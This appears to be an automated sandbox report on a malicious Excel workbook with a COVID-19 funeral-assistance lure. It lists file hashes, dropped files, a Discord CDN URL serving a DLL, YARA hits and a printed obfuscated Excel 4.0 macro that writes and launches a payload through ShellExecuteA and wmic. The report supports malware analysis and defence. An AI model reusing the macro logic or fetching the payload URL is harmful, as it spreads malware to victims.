                                          Category:dropped
                                          Size (bytes):565248
                                          Entropy (8bit):7.341714781097807
                                          Encrypted:false
                                          SSDEEP:12288:EGBK1zWlDqhPUVpqF9q9FAfPWvF+r3qTFCX1za7EV8RgfQOOvDC93:ENkIu2KAGIOwZ+v
                                          MD5:D05719D3327D0A8D4FDF1735C88732FE
                                          SHA1:1F6E535B5B90F10FEFD2B6667767962066A79CA9
                                          SHA-256:5A6318FD453EF307F504536334E4B91B47B618E34CB669E94E4F987B2FBEF8C1
                                          SHA-512:6CA3AA60526BA613C0322B69CAEA90F9FE5B19DCE63CFBD44D737A3C570110E35442698AA10BEECCA50047FAE444230E3491A10AFD99613D09D29413C16EC96A
                                          Malicious:false
                                          Reputation:low
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R..<...<...<..k....<...=.S.<.=....<.......<.......<.t.?...<.t.=.4.<.L.9...<.t..0.<..k....<..0.x.<......<..1..<..k....<.t.8.5.<..k..'.<..0D.).<..0D...<...x.<.Rich..<.....................................................................................................................PE..L...@>.a...........!.... p...@.......Z....................................................@.........................y...`.......x...............................8...0`..8...............................................D............................rdata...i.......p.................. ..`.rdata..............................@..@.data...xa... ...P... ..............@....rsrc................p..............@..@.reloc..q........ ..................0..B....................................................................................................................................
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\WIvRRHIemuhammadismyfriend[1].bin
                                          Process:C:\Windows\System32\mshta.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:downloaded
                                          Size (bytes):565248
                                          Entropy (8bit):7.341714781097807
                                          Encrypted:false
                                          SSDEEP:12288:EGBK1zWlDqhPUVpqF9q9FAfPWvF+r3qTFCX1za7EV8RgfQOOvDC93:ENkIu2KAGIOwZ+v
                                          MD5:D05719D3327D0A8D4FDF1735C88732FE
                                          SHA1:1F6E535B5B90F10FEFD2B6667767962066A79CA9
                                          SHA-256:5A6318FD453EF307F504536334E4B91B47B618E34CB669E94E4F987B2FBEF8C1
                                          SHA-512:6CA3AA60526BA613C0322B69CAEA90F9FE5B19DCE63CFBD44D737A3C570110E35442698AA10BEECCA50047FAE444230E3491A10AFD99613D09D29413C16EC96A
                                          Malicious:false
                                          Reputation:low
                                          IE Cache URL:https://cdn.discordapp.com/attachments/914827690882781237/923509513628307516/WIvRRHIemuhammadismyfriend.bin
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R..<...<...<..k....<...=.S.<.=....<.......<.......<.t.?...<.t.=.4.<.L.9...<.t..0.<..k....<..0.x.<......<..1..<..k....<.t.8.5.<..k..'.<..0D.).<..0D...<...x.<.Rich..<.....................................................................................................................PE..L...@>.a...........!.... p...@.......Z....................................................@.........................y...`.......x...............................8...0`..8...............................................D............................rdata...i.......p.................. ..`.rdata..............................@..@.data...xa... ...P... ..............@....rsrc................p..............@..@.reloc..q........ ..................0..B....................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\649C.tmp
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:Composite Document File V2 Document, Cannot read section info
                                          Category:dropped
                                          Size (bytes):1536
                                          Entropy (8bit):1.1464700112623651
                                          Encrypted:false
                                          SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                          MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                          SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                          SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                          SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\~DFA61A9980BD8D1A08.TMP
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):512
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3::
                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\~DFB260A50E17C248B1.TMP
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):3.9186749695826597
                                          Encrypted:false
                                          SSDEEP:192:6Zy43AgdLSUX7i/IwHv0xuyLBqgmQqx7v0P8+Dd4HHH9HHKW0gu/LCS9VvdT3h:4T7Zkc7VwH+eHHH5xcjx
                                          MD5:AC6C8E576978DAE084BEF38A220F39FA
                                          SHA1:80368A9A476B6C743EF37DC022A597B1C812DA0B
                                          SHA-256:B88C751D84B3C7A066787B43B577155D86E2FD630BEF4D23C3FEAC16F1C7ED3F
                                          SHA-512:2446DA7FD0A0801E5F5FCE2A17AE473EEE58DA6FFBC63EC51CD3E20814765020B6DD38CE8E0FB220C9FEEA743DB629C112387ECE2EAF0B86FD1B02263B0CB2E3
                                          Malicious:false
                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\Desktop\Results12232021.xls
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1200, Author: Use, Last Saved By: use, Name of Creating Application: Microsof, Create Time/Date: Thu Dec 16 12:07:56 2021, Last Saved Time/Date: Thu Dec 23 11:26:55 2021, Security: 1
                                          Category:dropped
                                          Size (bytes):423936
                                          Entropy (8bit):5.730815669272211
                                          Encrypted:false
                                          SSDEEP:6144:zl19aFmvPvdF+Xgrm8OWt2rtJuSGsejbuJ:RDasPvKQRdWaSMbq
                                          MD5:80D5259BB7E8573F86434D1084A37085
                                          SHA1:71091B79DB9854CCD38785FE354184C0FAC80B51
                                          SHA-256:4B4F4A31E708A91A23C17A7581D1F17DB3C9728A3D0F404F4CF7CABE058D678A
                                          SHA-512:E0CEECD3ACB096CBEBA9CDF4B763E2FB8D82F47FAC336ABA7F1257DC003AF4EA36C6A60081C8DD4CE87EF19E1CA6545C1A95172B1557EB84F44BF5C0580A934E
                                          Malicious:true
                                          Yara Hits:
                                          • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\Results12232021.xls, Author: John Lambert @JohnLaTwC
                                          • Rule: JoeSecurity_HiddenMacro, Description: Yara detected hidden Macro 4.0 in Excel, Source: C:\Users\user\Desktop\Results12232021.xls, Author: Joe Security
                                          Preview: ......................!.......................2...........1...............4...5...6...7...8...9...:...................................................................................................................................................................................................................................................................................................................................................................................................................................| ..........................\.p....user B.....=.....................=........J..8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...

                                          Static File Info

                                          General

                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1200, Author: Use, Last Saved By: use, Name of Creating Application: Microsof, Create Time/Date: Thu Dec 16 12:07:56 2021, Last Saved Time/Date: Thu Dec 23 11:26:55 2021, Security: 1
                                          Entropy (8bit):5.730688966816736
                                          TrID:
                                          • Microsoft Excel sheet (30009/1) 78.94%
                                          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                          File name:Results12232021.xls
                                          File size:423936
                                          MD5:8d1d1df2277e8730eee7de7fe28f60e1
                                          SHA1:773b3ff48428bdacf2afeb7fc9fd1261a2e0591c
                                          SHA256:4d21115441459063cf8403f94d3bb37201666be30622cb2cb4e2ffb32827192f
                                          SHA512:5f2f3d4b9295171dbbf246e2e6e23d07fa189bc7e3681ffd9c2778e3fef99621bf8f3b0a4c1d70061d6e06ec27f2c38151ccb4ba83b111bfe8051ca045834b76
                                          SSDEEP:6144:Ml19aFmvPvdF+Xgrm8OWt2rtJuSGsejbOJ:wDasPvKQRdWaSMbK
                                          File Content Preview:........................!.......................2...........1...............4...5...6...7...8...9...:..........................................................................................................................................................

                                          File Icon

                                          Icon Hash:e4eea286a4b4bcb4

                                          Static OLE Info

                                          General

                                          Document Type:OLE
                                          Number of OLE Files:1

                                          OLE File "Results12232021.xls"

                                          Indicators

                                          Has Summary Info:True
                                          Application Name:Microsoft Excel
                                          Encrypted Document:False
                                          Contains Word Document Stream:False
                                          Contains Workbook/Book Stream:True
                                          Contains PowerPoint Document Stream:False
                                          Contains Visio Document Stream:False
                                          Contains ObjectPool Stream:
                                          Flash Objects Count:
                                          Contains VBA Macros:True

                                          Summary

                                          Code Page:1200
                                          Author:User
                                          Last Saved By:user
                                          Create Time:2021-12-16 12:07:56
                                          Last Saved Time:2021-12-23 11:26:55
                                          Creating Application:Microsoft Excel
                                          Security:1

                                          Document Summary

                                          Document Code Page:1200
                                          Thumbnail Scaling Desired:False
                                          Contains Dirty Links:False
                                          Shared Document:False
                                          Changed Hyperlinks:False
                                          Application Version:786432

                                          Streams

                                          Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                          General
                                          Stream Path:\x1CompObj
                                          File Type:data
                                          Stream Size:114
                                          Entropy:4.25248375193
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 284
                                          General
                                          Stream Path:\x5DocumentSummaryInformation
                                          File Type:data
                                          Stream Size:284
                                          Entropy:2.66033532836
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . e . t . a . i . l . s . . . . . . . M . a . c . r . o . 1 . . . . . . . . . S . h . e . e . t . 1 . . . . . . . . . . . . . . . . . . . . . W . o .
                                          Data Raw:fe ff 00 00 05 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 bc 00 00 00 02 00 00 00 b0 04 00 00
                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 232
                                          General
                                          Stream Path:\x5SummaryInformation
                                          File Type:data
                                          Stream Size:232
                                          Entropy:3.16013314523
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . \\ . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . U . s . e . r . . . . . . . . . . . . . u . s . e . r . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . x . c . e . l . . . @ . . . . . L . u . . . @ . . . . i R . . . . . . . . . . . . .
                                          Data Raw:fe ff 00 00 05 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 b8 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 70 00 00 00 0c 00 00 00 98 00 00 00 0d 00 00 00 a4 00 00 00 13 00 00 00 b0 00 00 00 02 00 00 00 b0 04 00 00 1f 00 00 00 05 00 00 00
                                          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 417248
                                          General
                                          Stream Path:Workbook
                                          File Type:Applesoft BASIC program data, first line number 16
                                          Stream Size:417248
                                          Entropy:5.75586938029
                                          Base64 Encoded:True
                                          Data ASCII:. . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . u s e r B . . . . . = . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . J . . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . .
                                          Data Raw:09 08 10 00 00 06 05 00 7c 20 cd 07 c9 c0 00 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 75 73 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                          Macro 4.0 Code

                                          1,3,="ZEGyCvguwlxqOH"
                                          3,3,="kntVGCVfSER"
                                          6,3,="JEubwb"
                                          8,3,="hFmlrlDNnmNB"
                                          9,3,="PFNYhhzEbZnu"
                                          11,3,="JXxAsNGqsRhf"
                                          16,3,="CSzmAgwZLdPNgCe"
                                          19,3,="rMKhVfUgLJjXe"
                                          20,3,="COVID-19 Funeral Assistance Helpline 844-684-6333"
                                          22,3,="YISTCeb"
                                          24,3,="LqbxgCX"
                                          25,3,="eCOdhLYdCdQzqy"
                                          27,3,="roLLYFmoMLaUNdL"
                                          29,3,="shpbhreRNEbyxVB"
                                          31,3,="nlcwZdYf"
                                          33,3,="DtkEGuOUakcc"
                                          34,3,="zMimgfLHmWuotsY"
                                          35,3,="mailtupOLkf"
                                          37,3,="QmkJMQTSQjC"
                                          38,3,="eknKMsJKBL"
                                          40,3,="djbYUPoFyxpD"
                                          41,3,="iMpcrVNHI"
                                          42,3,="OPOlA"
                                          43,3,="C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf"
                                          45,3,="tEypQ"
                                          50,3,="vGzwsrERXanHP"
                                          52,3,="TveFxBKRRRUplg"
                                          53,3,="OhKbvXrtjhk"
                                          54,3,="iwkRSRSNQeED"
                                          56,3,="vGqNGTwBgue"
                                          59,3,="jpqXaHrKNkqN"
                                          60,3,="niQISlqOGbzJq"
                                          61,3,="YYYWtyzEbhqKGZF"
                                          63,3,="ufsgIv"
                                          65,3,="baaFpnWZQEmB"
                                          66,3,="aqDJPyr"
                                          68,3,="DvnngR"
                                          69,3,="jziCnZdlxVIJO"
                                          73,3,="XlbmloqlQeWLVIW"
                                          75,3,="VktvkHKsNB"
                                          76,3,="kjYwGefaYkc"
                                          79,3,="taPdBWCgpDAHXF"
                                          80,3,="mPcFvfEVlGTMnqx"
                                          81,3,="CcayxZcI"
                                          82,3,="tbSgtOxdka"
                                          83,3,="QGtAVI"
                                          87,3,="nJLrLB"
                                          88,3,="dUwZq"
                                          90,3,="nzgBI"
                                          91,3,="rPfVaszyttppVp"
                                          93,3,="gTOWilCVOB"
                                          94,3,="rOTjL"
                                          99,3,=FOPEN(D44, 3)
                                          100,3,="gNmtH"
                                          101,3,="NkcUxlD"
                                          102,3,="CwpxLSkUMFnpyeq"
                                          107,3,="JRxTRZiRELYXQuR"
                                          109,3,="QUCrDlBbnujjei"
                                          110,3,="chbGlVCyWd"
                                          111,3,="OFXVOCuhRIbsg"
                                          113,3,="iyJmrlWDxhiAKPX"
                                          114,3,="CjBjSp"
                                          119,3,="IEubyIOrZSU"
                                          120,3,="vhZsYgaJYcbXdp"
                                          123,3,="open"
                                          126,3,="PJwUYfjQwUz"
                                          129,3,="QBCfEnbYzsBF"
                                          134,3,="mQdRdmwEo"
                                          135,3,="CkWpG"
                                          136,3,="OmUfZb"
                                          137,3,="sKnICnLyfDCERm"
                                          138,3,="XZVKFoodi"
                                          139,3,="IsmuTavxvmgDqg"
                                          142,3,="CNpLi"
                                          143,3,="wmic.exe"
                                          145,3,="EGDiZI"
                                          146,3,="mLifVS"
                                          148,3,="qwLXGxbOXrTZV"
                                          151,3,="bXKDGKwG"
                                          152,3,="cBEdIhDGHx"
                                          155,3,="NYvnOieHYoMy"
                                          156,3,="IPQuJ"
                                          159,3,="atYWeBVMNxszk"
                                          160,3,="robTkQjQTWgu"
                                          162,3,="kbpAiNnmucwnM"
                                          165,3,="JJCCCJJ"
                                          166,3,="VXlmaraY"
                                          170,3,="tTUONOAINAtDzvK"
                                          176,3,="cfZAfLu"
                                          177,3,="HffBxdmcnVWBv"
                                          181,3,="hKWPEmg"
                                          182,3,="ZwdbEToitKtAav"
                                          185,3,="VpdQABzISnOSr"
                                          189,3,="mqBXyKyNHuLGp"
                                          190,3,="zcbVrnemDNJtLs"
                                          191,3,="XPeeMobpRoJovmW"
                                          192,3,=FOR.CELL(D74,Sheet1!AZ169:BK596, FALSE)
                                          195,3,="BzLNGL"
                                          197,3,="DQMggmZi"
                                          201,3,="PubgpzeADwk"
                                          202,3,="AYBMrbjXUmbnSNl"
                                          203,3,="SZBRSjCoEFc"
                                          206,3,="nOXaxLytnrl"
                                          207,3,="XCzjKeRBcT"
                                          209,3,="WVCScAN"
                                          212,3,="zMiuOdqYjpYKKKv"
                                          213,3,="ZdoDqzdKGUzlPot"
                                          214,3,="DisVyVjsPqtLDM"
                                          216,3,="KjEXHAoRexdVMo"
                                          220,3,="ngjMYOkAsZAOyd"
                                          221,3,="fweXWZtgcV"
                                          223,3,=FWRITE(0,CHAR(XlbmloqlQeWLVIW))
                                          224,3,="XuHutnj"
                                          226,3,="OMqxQ"
                                          227,3,="gPghw"
                                          229,3,="OqrBRuMcFZ"
                                          230,3,="xxcptVWYHHzVSuW"
                                          231,3,="AvDWodLImzt"
                                          232,3,="NvOdvgWrNRGWjHc"
                                          233,3,="FbXOWiueiv"
                                          234,3,="jWcxDTjpP"
                                          235,3,="mbDvPC"
                                          238,3,="GHisO"
                                          240,3,="cjUeLNyxqjU"
                                          242,3,="RlKvkGAuTlcldGe"
                                          243,3,="qqMFQfPAnU"
                                          248,3,="PFadvqc"
                                          250,3,="DHMfpjoflj"
                                          251,3,=NEXT()
                                          252,3,="fvZHkUlSNMc"
                                          254,3,="eJEHsC"
                                          255,3,="zYsyo"
                                          256,3,="MTGCjAPQdUwXH"
                                          257,3,="RgQUzqjVFJsvz"
                                          258,3,="VosectFIK"
                                          260,3,="nLfzeNtHbbQ"
                                          264,3,="ZdgMlLoD"
                                          267,3,="MFTBxf"
                                          270,3,="JGmWxXKCSQgnf"
                                          272,3,="QhIxK"
                                          275,3,="ShellExecuteA"
                                          277,3,="prAuI"
                                          279,3,="TIBcUuO"
                                          282,3,="PceVHfVTabrvA"
                                          286,3,="HHbALssjb"
                                          287,3,="oSlNFbQa"
                                          288,3,="NgJrxeYS"
                                          291,3,="DttoQGrfRetj"
                                          292,3,="tfUuUiEnalBuWqU"
                                          293,3,="XDAeSARKJADyKVV"
                                          295,3,="IXTGuE"
                                          296,3,="cPpTuhex"
                                          298,3,="FWHSk"
                                          299,3,=ALERT(D21)
                                          302,3,="xmXteSCY"
                                          305,3,="MJEQYCiRi"
                                          309,3,="PBPTwNpW"
                                          310,3,="IGInKIGytokAJP"
                                          311,3,="UjkNVATOczZyF"
                                          312,3,="rpOVwHfx"
                                          313,3,="zUuExOEV"
                                          314,3,="vMAgGHjuCTyA"
                                          316,3,="FzbybtoBn"
                                          318,3,="HyNeoa"
                                          319,3,="NLuFM"
                                          328,3,="LdjqxbAozaE"
                                          329,3,="Shell32"
                                          331,3,="LVESqkHVh"
                                          335,3,="QJgflGdXeqBuqA"
                                          341,3,="dMPZiujpSZFp"
                                          343,3,="DWtBH"
                                          344,3,="kFrwQdovCkuJrb"
                                          346,3,="pdxuuXwWZfXWt"
                                          347,3,="LjalgWVgFDlWme"
                                          348,3,="tIzLVPCcR"
                                          351,3,="jRKTj"
                                          352,3,="hCWfsUDiKgXdy"
                                          353,3,="UXnLKYZTNip"
                                          354,3,="EUhCOqJagsQzxTu"
                                          358,3,="sRQrxVneAPhaD"
                                          359,3,=FCLOSE(0)
                                          360,3,="hVHDz"
                                          361,3,="YOtDgXOfqjOdeN"
                                          366,3,="JflMIYqA"
                                          367,3,="izyDUrZjsLplGL"
                                          369,3,="TKsfaOI"
                                          371,3,="BZfNXEebk"
                                          373,3,="LovEs"
                                          375,3,="MRXWnFAcv"
                                          376,3,="yHZjdjNyAWAxk"
                                          380,3,="SJCyUd"
                                          3
                                          1,3,="ZEGyCvguwlxqOH"
                                          3,3,="kntVGCVfSER"
                                          6,3,="JEubwb"
                                          8,3,="hFmlrlDNnmNB"
                                          9,3,="PFNYhhzEbZnu"
                                          11,3,="JXxAsNGqsRhf"
                                          16,3,="CSzmAgwZLdPNgCe"
                                          19,3,="rMKhVfUgLJjXe"
                                          20,3,="COVID-19 Funeral Assistance Helpline 844-684-6333"
                                          22,3,="YISTCeb"
                                          24,3,="LqbxgCX"
                                          25,3,="eCOdhLYdCdQzqy"
                                          27,3,="roLLYFmoMLaUNdL"
                                          29,3,="shpbhreRNEbyxVB"
                                          31,3,="nlcwZdYf"
                                          33,3,="DtkEGuOUakcc"
                                          34,3,="zMimgfLHmWuotsY"
                                          35,3,="mailtupOLkf"
                                          37,3,="QmkJMQTSQjC"
                                          38,3,="eknKMsJKBL"
                                          40,3,="djbYUPoFyxpD"
                                          41,3,="iMpcrVNHI"
                                          42,3,="OPOlA"
                                          43,3,="C:\ProgramData\NxeBChwsIhYFkIhhSsLtP.rtf"
                                          45,3,="tEypQ"
                                          50,3,="vGzwsrERXanHP"
                                          52,3,="TveFxBKRRRUplg"
                                          53,3,="OhKbvXrtjhk"
                                          54,3,="iwkRSRSNQeED"
                                          56,3,="vGqNGTwBgue"
                                          59,3,="jpqXaHrKNkqN"
                                          60,3,="niQISlqOGbzJq"
                                          61,3,="YYYWtyzEbhqKGZF"
                                          63,3,="ufsgIv"
                                          65,3,="baaFpnWZQEmB"
                                          66,3,="aqDJPyr"
                                          68,3,="DvnngR"
                                          69,3,="jziCnZdlxVIJO"
                                          73,3,="XlbmloqlQeWLVIW"
                                          75,3,="VktvkHKsNB"
                                          76,3,="kjYwGefaYkc"
                                          79,3,="taPdBWCgpDAHXF"
                                          80,3,="mPcFvfEVlGTMnqx"
                                          81,3,="CcayxZcI"
                                          82,3,="tbSgtOxdka"
                                          83,3,="QGtAVI"
                                          87,3,="nJLrLB"
                                          88,3,="dUwZq"
                                          90,3,="nzgBI"
                                          91,3,="rPfVaszyttppVp"
                                          93,3,="gTOWilCVOB"
                                          94,3,="rOTjL"
                                          99,3,=FOPEN(D44, 3)
                                          100,3,="gNmtH"
                                          101,3,="NkcUxlD"
                                          102,3,="CwpxLSkUMFnpyeq"
                                          107,3,="JRxTRZiRELYXQuR"
                                          109,3,="QUCrDlBbnujjei"
                                          110,3,="chbGlVCyWd"
                                          111,3,="OFXVOCuhRIbsg"
                                          113,3,="iyJmrlWDxhiAKPX"
                                          114,3,="CjBjSp"
                                          119,3,="IEubyIOrZSU"
                                          120,3,="vhZsYgaJYcbXdp"
                                          123,3,="open"
                                          126,3,="PJwUYfjQwUz"
                                          129,3,="QBCfEnbYzsBF"
                                          134,3,="mQdRdmwEo"
                                          135,3,="CkWpG"
                                          136,3,="OmUfZb"
                                          137,3,="sKnICnLyfDCERm"
                                          138,3,="XZVKFoodi"
                                          139,3,="IsmuTavxvmgDqg"
                                          142,3,="CNpLi"
                                          143,3,="wmic.exe"
                                          145,3,="EGDiZI"
                                          146,3,="mLifVS"
                                          148,3,="qwLXGxbOXrTZV"
                                          151,3,="bXKDGKwG"
                                          152,3,="cBEdIhDGHx"
                                          155,3,="NYvnOieHYoMy"
                                          156,3,="IPQuJ"
                                          159,3,="atYWeBVMNxszk"
                                          160,3,="robTkQjQTWgu"
                                          162,3,="kbpAiNnmucwnM"
                                          165,3,="JJCCCJJ"
                                          166,3,="VXlmaraY"
                                          170,3,="tTUONOAINAtDzvK"
                                          176,3,="cfZAfLu"
                                          177,3,="HffBxdmcnVWBv"
                                          181,3,="hKWPEmg"
                                          182,3,="ZwdbEToitKtAav"
                                          185,3,="VpdQABzISnOSr"
                                          189,3,="mqBXyKyNHuLGp"
                                          190,3,="zcbVrnemDNJtLs"
                                          191,3,="XPeeMobpRoJovmW"
                                          192,3,=FOR.CELL(D74,Sheet1!AZ169:BK596, FALSE)
                                          195,3,="BzLNGL"
                                          197,3,="DQMggmZi"
                                          201,3,="PubgpzeADwk"
                                          202,3,="AYBMrbjXUmbnSNl"
                                          203,3,="SZBRSjCoEFc"
                                          206,3,="nOXaxLytnrl"
                                          207,3,="XCzjKeRBcT"
                                          209,3,="WVCScAN"
                                          212,3,="zMiuOdqYjpYKKKv"
                                          213,3,="ZdoDqzdKGUzlPot"
                                          214,3,="DisVyVjsPqtLDM"
                                          216,3,="KjEXHAoRexdVMo"
                                          220,3,="ngjMYOkAsZAOyd"
                                          221,3,="fweXWZtgcV"
                                          223,3,=FWRITE(0,CHAR(XlbmloqlQeWLVIW))
                                          224,3,="XuHutnj"
                                          226,3,="OMqxQ"
                                          227,3,="gPghw"
                                          229,3,="OqrBRuMcFZ"
                                          230,3,="xxcptVWYHHzVSuW"
                                          231,3,="AvDWodLImzt"
                                          232,3,="NvOdvgWrNRGWjHc"
                                          233,3,="FbXOWiueiv"
                                          234,3,="jWcxDTjpP"
                                          235,3,="mbDvPC"
                                          238,3,="GHisO"
                                          240,3,="cjUeLNyxqjU"
                                          242,3,="RlKvkGAuTlcldGe"
                                          243,3,="qqMFQfPAnU"
                                          248,3,="PFadvqc"
                                          250,3,="DHMfpjoflj"
                                          251,3,=NEXT()
                                          252,3,="fvZHkUlSNMc"
                                          254,3,="eJEHsC"
                                          255,3,="zYsyo"
                                          256,3,="MTGCjAPQdUwXH"
                                          257,3,="RgQUzqjVFJsvz"
                                          258,3,="VosectFIK"
                                          260,3,="nLfzeNtHbbQ"
                                          264,3,="ZdgMlLoD"
                                          267,3,="MFTBxf"
                                          270,3,="JGmWxXKCSQgnf"
                                          272,3,="QhIxK"
                                          275,3,="ShellExecuteA"
                                          277,3,="prAuI"
                                          279,3,="TIBcUuO"
                                          282,3,="PceVHfVTabrvA"
                                          286,3,="HHbALssjb"
                                          287,3,="oSlNFbQa"
                                          288,3,="NgJrxeYS"
                                          291,3,="DttoQGrfRetj"
                                          292,3,="tfUuUiEnalBuWqU"
                                          293,3,="XDAeSARKJADyKVV"
                                          295,3,="IXTGuE"
                                          296,3,="cPpTuhex"
                                          298,3,="FWHSk"
                                          299,3,=ALERT(D21)
                                          302,3,="xmXteSCY"
                                          305,3,="MJEQYCiRi"
                                          309,3,="PBPTwNpW"
                                          310,3,="IGInKIGytokAJP"
                                          311,3,="UjkNVATOczZyF"
                                          312,3,="rpOVwHfx"
                                          313,3,="zUuExOEV"
                                          314,3,="vMAgGHjuCTyA"
                                          316,3,="FzbybtoBn"
                                          318,3,="HyNeoa"
                                          319,3,="NLuFM"
                                          328,3,="LdjqxbAozaE"
                                          329,3,="Shell32"
                                          331,3,="LVESqkHVh"
                                          335,3,="QJgflGdXeqBuqA"
                                          341,3,="dMPZiujpSZFp"
                                          343,3,="DWtBH"
                                          344,3,="kFrwQdovCkuJrb"
                                          346,3,="pdxuuXwWZfXWt"
                                          347,3,="LjalgWVgFDlWme"
                                          348,3,="tIzLVPCcR"
                                          351,3,="jRKTj"
                                          352,3,="hCWfsUDiKgXdy"
                                          353,3,="UXnLKYZTNip"
                                          354,3,="EUhCOqJagsQzxTu"
                                          358,3,="sRQrxVneAPhaD"
                                          359,3,=FCLOSE(0)
                                          360,3,="hVHDz"
                                          361,3,="YOtDgXOfqjOdeN"
                                          366,3,="JflMIYqA"
                                          367,3,="izyDUrZjsLplGL"
                                          369,3,="TKsfaOI"
                                          371,3,="BZfNXEebk"
                                          373,3,="LovEs"
